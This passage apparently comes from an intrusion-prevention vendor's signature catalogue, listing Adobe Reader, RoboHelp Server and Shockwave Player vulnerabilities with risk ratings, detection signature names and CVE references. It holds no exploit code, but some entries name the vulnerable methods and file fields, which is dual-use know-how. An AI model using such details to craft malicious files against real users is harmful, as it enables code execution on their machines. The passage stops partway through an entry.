Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability exists in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Crash-CVE-2015-3056

References:

CVE-2015-3056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3056

Adobe-Reader-Heap-Overflow-CVE-2017-3055

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a heap overflow vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Heap-Overflow-CVE-2017-3055

References:

CVE-2017-3055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3055

Adobe-Reader-Heap-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There is a vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability

References:

CVE-2012-1525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1525

Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604

About this vulnerability:

Malicious PDF file detected

Risk:

Moderate

First detected in:

sgpkg-ips-504-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

There is a heap overflow vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604

References:

CVE-2013-0604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0604

Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0621

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-504-5211

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A possibly malicious PDF file, which may exploit ad vulnerability in Adobe Reader, was detected

References:

CVE-2013-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0621

Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
File-PDF_Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow

References:

CVE-2011-2436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2436

Adobe-Reader-Information-Disclosure-CVE-2017-3031

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Information-Disclosure-CVE-2017-3031

References:

CVE-2017-3031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3031

Adobe-Reader-Integer-Overflow-CVE-2010-2862

About this vulnerability:

An integer overflow vulnerability in Adobe Reader

Risk:

Critical

First detected in:

sgpkg-ips-332-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Reader

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Adobe Reader.

Situation:

E-Mail_BS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
HTTP_SS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
File-PDF_Adobe-Reader-Integer-Overflow-CVE-2010-2862

References:

CVE-2010-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2862

Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371

About this vulnerability:

Detected an attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

Detected an attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371

References:

CVE-2011-4371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4371

BID-51351
http://www.securityfocus.com/bid/51351

Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373

About this vulnerability:

Detected an attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

Detected an attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373

References:

CVE-2011-4373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4373

BID-51350
http://www.securityfocus.com/bid/51350

Adobe-Reader-JavaScript-Spell.customDictionaryOpen-Method-Memory-Corruption

About this vulnerability:

A buffer overflow vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-221-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Adobe Reader and Acrobat on Linux/Unix platform. The vulnerability is due to insufficient input validation in the implementation of the customDictionaryOpen JavaScript method. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious PDF file. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.

Situation:

HTTP_SS-Adobe-Acrobat-CustomDictionaryOpen-BOF
File-PDF_Adobe-Acrobat-CustomDictionaryOpen-BOF

References:

CVE-2009-1493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493

BID-34740
http://www.securityfocus.com/bid/34740

OSVDB-54129
http://www.osvdb.org/54129

Adobe-Reader-JavaScript-Vulnerability-2011-2442

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-JavaScript-Vulnerability-2011-2442
File-PDF_Adobe-Reader-JavaScript-Vulnerability-2011-2442

References:

CVE-2011-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2442

Adobe-Reader-JPEG-Multiple-App0-Markers

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-JPEG-Multiple-App0-Markers
File-PDF_Adobe-Reader-JPEG-Multiple-App0-Markers

References:

CVE-2011-2440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2440

Adobe-Reader-Memory-Corruption-CVE-2017-3019

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3019

References:

CVE-2017-3019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3019

Adobe-Reader-Memory-Corruption-CVE-2017-3025

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3025

References:

CVE-2017-3025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3025

Adobe-Reader-Memory-Corruption-CVE-2017-3030

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3030

References:

CVE-2017-3030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3030

Adobe-Reader-Memory-Corruption-CVE-2017-3036

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader. A remote attacker could use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Adobe-Reader-Memory-Corruption-CVE-2017-3036

References:

CVE-2017-3036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3036

Adobe-Reader-Memory-Corruption-CVE-2017-3050

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader.

Situation:

File-GIF_Adobe-Reader-Memory-Corruption-CVE-2017-3050

References:

CVE-2017-3050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3050

Adobe-Reader-Memory-Corruption-CVE-2017-3056

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3056

References:

CVE-2017-3056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3056

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147

References:

CVE-2012-4147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4147

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There is a vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148

References:

CVE-2012-4148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4148

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150

References:

CVE-2012-4150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4150

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151

References:

CVE-2012-4151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4151

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152

References:

CVE-2012-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4152

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There is a vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153

References:

CVE-2012-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4153

Adobe-Reader-OpenTextFile-Buffer-Overflow

About this vulnerability:

An Adobe Reader OpenTextFile Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-802-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Adobe Reader, versions 9.3.3 and before, which allows remote attackers to have users execute arbitrary programs specified in a PDF document through the OpenTextFile function.

Situation:

File-PDF_Adobe-Reader-OpenTextFile-Buffer-Overflow

References:

CVE-2010-1240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240

OSVDB-63667
http://www.osvdb.org/63667

Adobe-Reader-Pcx-Height-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-Pcx-Height-Integer-Overflow
File-PDF_Adobe-Reader-Pcx-Height-Integer-Overflow

References:

CVE-2011-2437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2437

Adobe-Reader-Pict-Header-Packet-Overflow

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

High

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Pict-Header-Packet-Overflow

References:

CVE-2011-2435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2435

Adobe-Reader-Player-CVE-2017-2966

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a heap buffer overflow vulnerability in the ImageConversion component of Adobe Acrobat. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Adobe-Reader-CVE-2017-2966

References:

CVE-2017-2966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2966

Adobe-Reader-Printseps-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Reader

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Adobe Acrobat and Reader products. The vulnerability is due to a design error error when parsing PDF files containing a JavaScript call to the Doc.printSeps method. Remote attackers could exploit this vulnerability by enticing target users to open the malicious PDF document in a vulnerable version of Adobe Reader. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. If code execution is failed, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Adobe-Reader-Printseps-Memory-Corruption
File-PDF_Adobe-Reader-Printseps-Memory-Corruption

References:

CVE-2010-4091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4091

BID-44638
http://www.securityfocus.com/bid/44638

OSVDB-69005
http://www.osvdb.org/69005

Adobe-Reader-Security-Bypass-CVE-2013-0624

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-504-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader; Adobe Acrobat

Type:

Malfunction

Description:

There is a security bypass vulnerability in Adobe Acrobat and Adobe Reader.

Situation:

References:

CVE-2013-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0624

Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622

About this vulnerability:

A security bypass vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-505-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

There is a security bypass vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622

References:

CVE-2013-0622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0622

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049

References:

CVE-2012-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2049

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149

About this vulnerability:

Malicious PDF file detected

Risk:

Moderate

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

A malicious PDF file was detected

Situation:

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149

References:

CVE-2012-4149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4149

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155

About this vulnerability:

Malicious PDF file detected

Risk:

Moderate

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

A malicious PDF file was detected

Situation:

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155

References:

CVE-2012-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4155

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157

About this vulnerability:

Malicious PDF file detected

Risk:

Moderate

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

A malicious PDF file was detected.

Situation:

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157

References:

CVE-2012-4157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4157

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159

About this vulnerability:

Malicious PDF file detected

Risk:

Moderate

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Input Validation

Description:

A malicious PDF file was detected.

Situation:

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159

References:

CVE-2012-4159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4159

Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Adobe Acrobat Reader. The vulnerability is due to an integer overflow when processing the "Shading Count" field in the CLOD Mesh Declaration block. This vulnerability may be exploited by remote attackers to execute arbitrary code on the vulnerable system by enticing a user to open a maliciously crafted PDF document. In attack scenarios where code execution is successful, the injected code will run within the security context of the currently logged in user. If code execution fails, the affected application may terminate abnormally leading to a denial of service condition.

Situation:

HTTP_SS-Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
File-PDF_Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow

References:

CVE-2010-0196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0196

BID-39329
http://www.securityfocus.com/bid/39329

Adobe-Reader-Use-After-Free-CVE-2015-3057

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3057

References:

CVE-2015-3057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3057

Adobe-Reader-Use-After-Free-CVE-2015-3059

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3059

References:

CVE-2015-3059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3059

Adobe-Reader-Use-After-Free-CVE-2017-3014

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-877-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3014

References:

CVE-2017-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3014

Adobe-Reader-Use-After-Free-CVE-2017-3057

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Reader.

Situation:

File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3057

References:

CVE-2017-3057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3057

Adobe-RoboHelp-Server-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Adobe Systems RoboHelp Server

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Systems RoboHelp Server

Type:

Input Validation

Description:

There is a vulnerability in Adobe Systems RoboHelp Server. The vulnerability is due to an insufficient validation of the POST requests sent to the web server, allowing an unauthenticated attacker to upload and execute arbitrary files. Successful exploitation of this vulnerability may lead to arbitrary code execution in the context of the SYSTEM user.

Situation:

HTTP_CS-Adobe-RoboHelp-Server-Arbitrary-File-Upload

References:

CVE-2009-3068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3068

BID-36245
http://www.securityfocus.com/bid/36245

Adobe-RoboHelp-Server-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe Systems RoboHelp Server

Risk:

Moderate

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

Adobe Systems RoboHelp Server

Type:

Directory Traversal

Description:

Improper validation of the fileName parameter in certain requests causes a directory traversal vulnerability in Adobe RoboHelp Server. A successful attack can allow code to be executed with system privileges.

Situation:

HTTP_CS-Adobe-RoboHelp-Server-Filename-Directory-Traversal

References:

CVE-2021-42727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42727

Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in Adobe Shockwave Director detected

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Shockwave Director

Type:

Malfunction

Description:

A buffer overflow vulnerability exists in Adobe Shockwave Player. The vulnerability is due to an error allocating a buffer for the KEY* element in a Director file, which leads to copying data from the file past the end of this buffer. A remote attacker can exploit this vulnerability by enticing a target user to visit a maliciously crafted web site.

Situation:

HTTP_SS-Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow

References:

CVE-2011-2111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2111

BID-48300
http://www.securityfocus.com/bid/48300

OSVDB-73028
http://www.osvdb.org/73028

Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to insufficient validation of certain values in a pamm chunk of a Director file. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user. In the case of an unsuccessful attack, the affected application may terminate abnormally.

Situation:

HTTP_SS-Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption

References:

CVE-2010-4084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4084

Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption

About this vulnerability:

Adobe Shockware player has a vulnerability in tSAC chunk parsging which can result in arbitrary code execution

Risk:

High

First detected in:

sgpkg-ips-345-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to a signedness error while parsing tSAC chunks in Adobe Director files. By providing a certain negative value, calculation of a pointer may lead to a memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product.

Situation:

HTTP_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption

References:

CVE-2010-2866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866

BID-42665
http://www.securityfocus.com/bid/42665

Adobe-Shockwave-Director-tSAC-Chunk-String-Termination-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

A memory corruption vulnerability has been identified in Adobe Shockwave Player. The vulnerability is due to the software blindly using a string-size value, which is provided in the file, to null-terminate a string. This allows an attacker to write a null-byte at a controlled offset from the beginning of the string buffer. A remote attacker can exploit this vulnerability by enticing a target user to visit a maliciously crafted web site containing a specially crafted Adobe Director file. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the affected application abnormally.

Situation:

File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Termination-Memory-Corruption

References:

CVE-2011-2118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2118

Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution

About this vulnerability:

A code execution vulnerability in Adobe Shockwave Player

Risk:

High

First detected in:

sgpkg-ips-306-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Systems Shockwave Player

Type:

Input Validation

Description:

There is a code execution vulnerability in Adobe Shockwave Player. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious DIR file with a vulnerable version of the product to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
File-RIFF_Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution

References:

CVE-2010-1292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1292

BID-40079
http://www.securityfocus.com/bid/40079

OSVDB-64657
http://www.osvdb.org/64657

Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

